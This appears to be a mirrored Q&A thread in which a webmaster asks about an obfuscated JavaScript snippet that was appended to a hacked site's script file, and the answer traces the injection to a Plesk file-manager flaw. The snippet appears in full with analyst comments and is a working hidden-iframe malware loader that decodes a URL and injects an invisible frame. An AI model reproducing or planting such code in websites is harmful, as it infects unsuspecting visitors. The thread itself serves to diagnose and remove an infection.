Question

My website triggers this browser warning: "mydomain.com contains malware. Your computer might catch a virus if you visit this site."

After checking in the webmaster tool, I found that a JavaScript file had been changed and some code had been appended to it, even though I had already changed the FTP and other passwords.

I am surprised that this code could be inserted into a read-only file on the server when the FTP password had already been changed.

What is this? Is it a virus attack or something else, and how can I check for and remove the virus (if any)?

The following code was added to the JavaScript file.

// Obfuscated snippet that was appended to the site's JavaScript file (see the question above).
// Net effect, read from the statements below: it decodes a hidden URL and attaches a
// 1px x 1px absolutely-positioned iframe pointing at that URL to document.body.
// Filler to ignore while reading: every if('X'=='Y') compares two different string
// literals, so it is always false and its body never runs; the empty functions and the
// unused vars are never referenced by the working statements.
if('CdkO'=='WJGLZ')WltF();function VrzYJI(){var fxko='MQjxtI';if('CyWq'=='IeMRba')PLxWxh();}
// The \x hex escapes hide property names from simple text searches:
// tfhbJZ = "constructor", px0_var = "0px", WXUGCTeW = "parseInt".
var tfhbJZ="con\x73\x74\x72ucto\x72";function nCesU(){}var LibD='DtiXVu';var px0_var="0p\x78";if('AUEe'=='jkeMwo')dgZHo='JixI';var WXUGCTeW="par\x73eIn\x74";var fJdwiU='HkKPc';function YKEF(){var IPUbt='lpVuaP';if('hgcAK'=='NSNfa')aMlM();}
// appVersion_var = "appVersion" (read from navigator further down).
var appVersion_var="a\x70pV\x65rsion";var GNYH='ZRUtGA';if('eBdo'=='zvBN')iPKu='hnyr';function vOWkf(){}function ZKAxLa(){var wLRC='vLarQA';if('PtqFaq'=='fUwi')XIGbIQ();}
// lVVSNNg accumulates the decoded URL; px1_var = "1px", YZuDAwsjn = "body",
// JTrlocAdo = "appendChild".
var lVVSNNg="";var CxCP;var px1_var="1p\x78";var ZsUS;var YZuDAwsjn="b\x6fd\x79";var iuvTLT=123;if('jKCKy'=='oGHZN')BdGS();var JTrlocAdo="appendChild";function gclv(){var zanTcM='fvrmqz';if('BnHRcw'=='EEsejm')SMOo();}
// KWdpWKXJ is the encoded iframe URL: pairs of hex digits, each byte shifted by +37.
// bQdKIy = "slice".
var KWdpWKXJ="8d9999955f54549497868b86965388949254889794938953958d95";function OQzFK(){var FLac='plfdm';if('LFoy'=='EwqxJ')uPUdDb();}if('gdBD'=='BwqmW')aCEU();var IBUm='yeFDT';var bQdKIy="sli\x63\x65";function FHIiLK(){var MBkF='EuYDLV';if('PvzvCY'=='fRLQH')iFuid();}
// Decoder. wLrupv is whatever `this` is inside a plain function call (the global object
// in non-strict code); mIpTJBqZc is "joPfVdCy"["constructor"], i.e. String. The loop takes
// two hex digits at a time, runs parseInt(pair, 16) - 37 and appends
// String.fromCharCode(result) to lVVSNNg. VUAzhFZU is assigned without `var`.
// Decoding the string above by hand gives an http:// URL for a .php script on a
// third-party host (defanged: hxxp://orafaq[.]com/crond.php).
var CxmPcURq="fromCharCode";var HyNEe='OZSvI';var wLrupv=(function(){var StkS='epJJDq';return this;if('SccXj'=='SVyct')xEXC();function pfHHB(){}})();if('funs'=='UyyiNF')amGGs();var mIpTJBqZc="joPfVdCy"[tfhbJZ];var wjjFIK=33;var YEHEAS;for(var pWCeJ=0;pWCeJ<KWdpWKXJ.length;pWCeJ+=2){if('ZFrN'=='VxPc')QczgU='hFfl';VUAzhFZU=wLrupv[WXUGCTeW](KWdpWKXJ[bQdKIy](pWCeJ,pWCeJ+2),16)-37;var VLFmeK;lVVSNNg+=mIpTJBqZc[CxmPcURq](VUAzhFZU);if('prqjym'=='UHrJa')MiuvBu();}
// REdbBzld is the name given to the iframe.
var zaZhFI=293;if('YzpRXm'=='MNJwSK')tTTq='AEeBR';var REdbBzld="DdTPKzFI";var MQuCD='JPTBg';function EaYq(){}if('MVbJ'=='RFbVx')zKUf='zdnfP';function KEgn(){var Hsch='ZrBxl';if('NkwuXz'=='FSzAyt')pTXBE();}
// oYUpEIig is the argument later passed to document.createElement. When
// navigator.appVersion contains "MSIE" it is a full <iframe name=... src=...> markup
// string (presumably for old Internet Explorer builds that accepted markup there -
// confirm); otherwise it is the plain tag name 'iframe'.
var oYUpEIig="";var Vthu=277;if(navigator[appVersion_var].indexOf("MSIE")!=-1){if('bFpRU'=='GsDnn')qygk='lmUxN';var ecSd;oYUpEIig='<iframe name="'+REdbBzld+'" src="'+lVVSNNg+'">';if('sBZK'=='rxsdM')bKacE();}else{if('PHngtx'=='GLlAu')bcSoAG();function SYYU(){}
oYUpEIig='iframe';var YIBQP=222;}
function JwDx(){var RzMKo='supF';if('XXDiVZ'=='QibJLF')Hwfn();}
// VxmJyYuwi is the iframe element.
var VxmJyYuwi=document.createElement(oYUpEIig);if('pgsYEc'=='NTSgKU')Brfc='Rnuk';function PZbvIF(){}
// vIysu is attached to the element as a method; it sets the element's src to the decoded URL.
VxmJyYuwi.vIysu=function(){var aRwK;if('Qqzu'=='FJXo')druxka='GGBLEL';this["src"]=lVVSNNg;var FuOS;var PScx=23;}
// Styling that makes the frame effectively invisible: top 0px, right 0px, height 1px,
// width 1px, position absolute. vIysu() is called here, and the name is set.
var cRuRe=258;var YsPwxC;VxmJyYuwi.style.top=px0_var;var QetiQ='DZEkb';VxmJyYuwi.vIysu();if('JggEby'=='WOvNk')zMGOX();if('aLKZ'=='MAUOW')eFWE='gOXg';if('yHoD'=='PBdzQ')xYVoer='nisPV';VxmJyYuwi.name=REdbBzld;function YEJay(){}var ZNWOM;VxmJyYuwi.style.height=px1_var;function XDwP(){}
VxmJyYuwi.style.position="absolute";if('xbIySc'=='yNlEH')eOJWpQ='ikyk';function IMeAq(){}
// orSoOjwi attaches the iframe: if document.body exists it calls
// document.body.appendChild(VxmJyYuwi); otherwise it re-schedules itself with
// setTimeout(orSoOjwi, 120) until the body is available.
var irdJAD=172;VxmJyYuwi.style.width=px1_var;VxmJyYuwi.style.right=px0_var;if('kndd'=='BkrF')WGwYa='VVer';var uoEnJ='youKio';function orSoOjwi(){if('MnXf'=='nTILss')FgeFCT='jDxk';if(document[YZuDAwsjn]){var DhGHk='ajfbHe';function Ydkz(){var GWqvCL='MvgtmN';if('XpgqVo'=='rYhw')uggAO();}
document[YZuDAwsjn][JTrlocAdo](VxmJyYuwi);var FWgG='DHITvG';}else{if('FOmyN'=='ZcJs')pnCabN='lFdTU';setTimeout(orSoOjwi,120);if('EkcQ'=='tVynkk')nGBNjE='MVgOWc';var sjLbg;}
function eciRV(){}}
// Entry point: orSoOjwi() runs as soon as the script is evaluated.
// Detection hints taken from this sample: a long hex-only string literal next to
// "fromCharCode" and \x-escaped "parseInt"/"constructor", followed by createElement of
// an iframe sized 1px.
function EJwt(){var uKrE='wCpD';if('pkYdXv'=='oOXOLr')mljDR();}var BCNgRv;orSoOjwi();var vxWIdO='KQBivA';var CfZn=36;var RXTyN;function cxqTMA(){var mAhD='QhbH';if('PaNmx'=='EkYttb')rfxOr();}var EUSU;

Solution

Plesk up to version 10.3 is vulnerable.

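The malicious JavaScript was injected into my web pages through the file manager, which would explain why changing the FTP password did not stop it. Ultimately ports 8443 and 8447 were blocked and the issue was resolved. Blocking those ports only closes the way in; the code already appended to the files still has to be removed, for example by restoring them from a known-good copy.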

Another option is to upgrade Plesk to version 11.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow